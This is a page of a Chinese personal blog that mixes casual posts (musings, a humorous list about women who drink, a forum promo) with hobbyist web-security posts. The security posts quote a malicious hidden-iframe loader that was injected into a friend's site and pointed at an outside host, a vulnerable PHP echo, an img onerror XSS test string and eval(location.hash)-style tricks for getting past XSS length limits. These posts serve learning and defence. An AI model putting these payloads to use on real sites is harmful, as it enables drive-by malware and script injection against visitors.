May 3

杂谈 不指定

woyigui , 16:47 , 娱乐休闲 , 评论(3) , 引用(0) , 阅读(813) , Via 本站原创
  有时候会常常的想一些事情,也就会有一些想法。当身边的人随着自己不断的努力而接触更加厉害的人,自己就会觉得自己的不足与落破。也会不断的接受的不同的打击。不管怎么的努力,都无法超越一些人,不管技术还是生活,都无法满足自己所要求的,虽然要求不高。相比一些人来说,自己目前还算好的,但是往上看的话,再相比一些人,自己真的不算什么。。。。。
   不知道以后会怎样。。。。。。。我想的太多了!
Tags:
Apr 30

喝酒的女人 不指定

woyigui , 13:43 , 娱乐休闲 , 评论(1) , 引用(0) , 阅读(641) , Via 本站原创
   貌似很准确的说,因为这是一个女人总结的。。
引用
   关于女人与酒有三句经典话语:一般的女人不喝酒,女人不喝一般的酒,喝酒的女人不一般。
   女人饮酒是道靓丽风景,就和女人抽烟一样,有那么一点不寻常,也更加吸引人们的眼光。男人对喝酒的女人总有一点异样的感觉,有点喜欢又有点怕,因为男人明白,女人不喝则矣,若真喝酒的女人,男人又有点惧怕,赢不漂亮输不光彩。可是在酒桌上最能看出女人的性格:
   一类:酒到杯干,来者不拒的女人。属于豪放女性,个性泼辣,是极好的红颜知己。
   二类:滴酒不沾的女人。是标准淑女,一旦用情绝对专一。
   三类:喝的不多装醉的女人。是聪明女,自我控制极佳,做事讲究手段,目的性很强。
   四类:自己不喝却想灌醉别人的女人。这样的女人如果再有一副娇好的容貌,对男人将是致命武器。          
   五类:不该醉偏醉的女人。麻烦女人,易动感情,爱闹的天翻地覆。
   六类:该醉不醉的女人。是冷静女人,性格坚强,孤芳自赏。观察力敏锐,能洞透男人的心灵。
   七类:失意喝酒的女人,是脆弱的女人。易受伤,尤其对感情拿的起放不下。
   八类:得意时猛喝酒的女人,是矛盾女人。 外冷内热,热如火山 。
   喝酒时看女人更准确,女人喝酒也很美。纤手持高脚杯,浅斟慢饮。两腮绯红,双眸一泓醉意,温柔中揉入了娇媚,忧伤中又让男人感到那么楚楚可怜。喝酒的女人总是多一点点特别,也多了对生活的品味。
Tags:
Apr 28

json xss 防范 不指定

woyigui , 19:15 , 网络安全 , 评论(0) , 引用(0) , 阅读(1087) , Via 本站原创
   好像最近大家对 json xss 不是太热,Google有过一次:http://ha.ckers.org/blog/20060704/cross-site-scripting-vulnerability-in-google/
好像大牛们早就知道这种了。

那么防范这样的XSS也是很容易的,比如有XSS漏洞的页面是这样的:
<?PHP
  $woyigui = $_GET["xss"];
  echo $woyigui;
?>

当然了,具体应用时更为复杂,修补方法很简单,开发人员可以改成如下这样:
Tags: ,
Apr 27

挂马也小心 不指定

woyigui , 15:02 , 网络安全 , 评论(2) , 引用(0) , 阅读(1336) , Via 本站原创
   朋友的网被挂马,看了一下,是这样的:
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=http://www.wansf.net/a10/a10.htm></iframe>")
document.write("</div>")}

这年头挂马也知道防范呀!
Tags:
Apr 27

抓虾很弱 不指定

woyigui , 14:55 , 网络安全 , 评论(0) , 引用(0) , 阅读(731) , Via 本站原创
    昨天那篇blog,有人说在zhuaxia下面会XSS,因为我不太用抓虾,不是太了解。关于这个问题,本以为是标签闭合的源故,左测试右测试,最后原因是因为抓虾本身就没什么过滤。听听朋友汗心的话:
[郑州]-woyigui 14:59:03
可以XSS。\?
[洛阳]-M.K4<shellcoder@126.com> 14:59:47
  其他的blog都可以..就wordpress不行..
[郑州]-woyigui 14:59:57

[洛阳]-M.K4<shellcoder@126.com> 15:00:38
  最早的时候是用抓虾浏览童童的blog..sohu的..一篇文章是xss测试语句大全..然后直接把我IE给卡死鸟
[郑州]-woyigui 15:01:03

[郑州]-woyigui 15:01:18
这么说的话,抓虾很烂了。。
[洛阳]-M.K4<shellcoder@126.com> 15:02:13
  所以我现在用google reader
[郑州]-woyigui 15:02:23

[洛阳]-M.K4<shellcoder@126.com> 15:02:38
  但是抓虾功能很多
[郑州]-woyigui 15:02:52
多有毛用。。
[洛阳]-M.K4<shellcoder@126.com> 15:02:56
  可以给文章加标签啥的.很方便..
Tags:
Apr 26

IE依然有闭合功能 不指定

woyigui , 23:46 , 网络安全 , 评论(1) , 引用(0) , 阅读(1256) , Via 本站原创
<HTML><BODY>
<IMG SRC="" onerror="alert('XSS')"
<center>

当时这篇文章 http://www.woyigui.cn/html-Tab-closure/ 没测试到IE的闭合,当未结束的标签的其后有其他的任意标签都可以造成闭合,不知道是不是IE 的容错处理造成的结果。如果一个正则在查找开始<与结束 >的话,那就可以利用闭合绕过了。还有很多东西要测试呀,继续看书!

补充: http://www.woyigui.cn/html-Tab-closure/  这篇文章没有权威性,当时测试的时候太幼稚。只对script进行测试,而script在IE下,必须以
</script>
结尾才可执行。
Tags:
Apr 26

Bypassing XSS Length 不指定

woyigui , 18:16 , 网络安全 , 评论(2) , 引用(0) , 阅读(1189) , Via 本站原创
  从周五晚上一直白天黑夜的看 XSS_Attacks_-_Cross_Site_Scripting_Exploits_and_Defense_(Syngress-2007) 这本书,估计很多大牛已经看过了,哎,放在电脑上一直没看完,时间也不多,有时间了就翻上几页,加上是英文的,老费劲。到今天,已经看到 150 多页了,嗯,坚持。
  先说说这个Bypassing XSS Length Limitations,文中提到了一种方法挺好,查了下html手册,location可以利用三个属性:
<script>eval(location.hash.substr(1))</script>
<script>eval(location.search.substr(1))</script>
<script>eval(location.href.substr(52,60))</script>

第三种方法要就要根据情况算值,如果在localtion.href中查找字符串位置,再处理,就会增加url长度了。具体的值是最短的了。以上属为菜鸟想法,大牛莫笑。
Tags:
Apr 22

非常批处理的宣传Flash 不指定

woyigui , 09:36 , 娱乐休闲 , 评论(5) , 引用(0) , 阅读(1120) , Via 本站原创
   今天无意中又看见了当年为宣传非常批处理论坛X林做的Flash了,再拿出来晒晒吧!
Flash Player文件
点击打开/折叠播放器

想想非常批处理( http://bbs.verybat.org ) 也走了好几个年头了,现在发展更加强大,不过惭愧的说,现在因为工作,没有太多时间来管理了。大家没事了也可以过来坐坐,喝喝批处理这杯清茶。
Tags:
分页: 7/62 第一页 上页 2 3 4 5 6 7 8 9 10 11 下页 最后页 [ 显示模式: 摘要 | 列表 ]